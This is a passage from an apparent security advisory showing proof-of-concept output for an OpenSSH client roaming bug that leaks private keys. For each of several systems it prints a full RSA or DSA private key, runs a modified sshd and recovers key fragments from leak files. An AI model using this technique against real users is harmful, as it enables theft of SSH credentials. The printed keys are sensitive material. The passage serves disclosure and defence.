PFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:2048\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-35ee7ab0/infoleak\nMIIEogIBAAKCAQEAzjortydu20T6wC6BhFzKNtVJ9uYSMOjWlghws4OkcXQtu+Cc\nVEhdal/HFyKyiNMAUDMi0gjOHsia8X4GS7xRNwSjUHOXnrvPne/bGF0d4DAxfAFL\n9bOwoNnBIEFci37YMOcGArvrEJ7hbjJhGTudekRU78IMOichpdYtkpkGUyGmf175\nynUpCcJdzngL8yF9Iezc8bfXAyIJjzjXmSVu9DypkeUBW28qIuMr5ksbekHcXhQn\nw8Y2oEDeyPSGIdWZQcVpdfaAk+QjCEs84c0/AvZoG2iY85OptjNDfynFJSDR5muU\nMANXJm5JFfC89fy0nGkQJa1FfNpPjUQY8hWz7QIDAQABAoIBAQC36R6FJrBw8PIh\noxezv8BB6DIe8gx0+6AqinpfTN3Ao9gJPYSMkUBlleaJllLbPDiCTSgXYOzYfRPY\nmwfoUJeo1gUCwSMM1vaPJZEhCCGVhcULjmh8RHQW7jqRllh+um74JX6xv34hA1+M\nk3cONqD4oamRa17WGYGjT/6yRq9iP/0AbBT+haRKYC4nKWrdkqEJXk10pM2kmH6G\n+umbybQrGrPf854VqOdftoku0WjBKrD0hsFZbB24rYmFj+cmbx+cDEqt03xjw+95\nn5xM/97jqB6rzkPAdRUuzNec+QNGMvA+4YpItF1vdEfd0N3Jl/VIQ+8ZAhANnvCt\n8uRHC7OhAoGBAO9PqmApW1CY+BeYDyqGduLwh1HVVZnEURQJprenOtoNxfk7hkNw\nrsKKdc6alWgTArLTEHdULU8GcZ6C0PEcszk2us3AwfPKko8gp2PD5t/8IW0cWxT5\ncMxcelFydu8MuikFthqNEX4tPNrZy4FZlOBGXCYlhvDqHk+U7kVIhkLFAoGBANyb\n3pLYm7gEs9zoL5HxEGvk9x2Ds9PlULcmc//p+4HCegE0tehMaGtygQKRQFuDKOJV\nWGKRjgls7vVXeVI2RABtYsT6OSBU9kNQ01EHzjOqN53O43e6GB4EA+W/GLEsffOZ\npCw09bOVvgClicyekO3kv0lsVvIfAWgxVQY0oZ8JAoGBAIyisquEYmeBHfsvn2oM\nT32agMu0pXOSDVvLODChlFJk2b1YH9UuOWWWXRknezoIQgO5Sen2jBHu5YKTuhqY\nFTNAWJNl/hU5LNv0Aqr8i4eB8lre2SAAXyuaBUAsFnzxa82Dz7rWwDr4dtTePVws\nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-6cb31d82/infoleak\n... \nuvL6Jlk8oIqf62Q1T7ljn5NJAoGAQ8ZHHMobHO+k6ksSwj1TFDKlkJWzm3ep0nqn\nzIlv0S+UF+a/s/w1YD0vUUCaiwLCfrZFjxK0lkS3LPyQsyckwRTZ8TYGct5nQcsF\nALHrMYgryfmTfGbZne8R23VX+qZ2k24yN7qVeXSZiM1ShmB4mf1anw3/sCbCYeY1\n/tAQjzECf1NKzRdfWRhiBqlEquNshrUNWQxYVnXl+WPgilKAIc1XJ9M0dOCvhwjk\nkRTxN77l+klobzq+q+BtPiy9mFmwtwPbAP8l5bVzkZSY2FBDOQiUWS9ZJrCUupeS\nY1tzYFyta0xSod/NGoUd673IgfLnfiGMOLhy+9qhhwCqF10RiS0=\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.8, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n$ /usr/bin/ssh -V\nOpenSSH_7.0, LibreSSL 2.2.2\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL\nruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s\n17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8\nL/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh\nxSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP\nvavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl\nJka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP\nKyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19\nqJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY\ngQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK\nQolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt\ngKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL\ncQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB\n+s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl\nhcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri\nhBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh\nvhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O\nnFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG\n8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n-----END RSA PRIVATE KEY-----\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 1 %h %p\" -p 222 127.0.0.1\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n(this example requires a ProxyCommand because of the NULL-aitop bug\ndescribed in the Mitigating Factors of the Information Leak section, and\ncrashes because of the NULL-pointer dereference discussed in the\nMitigating Factors of the Buffer Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings /tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings 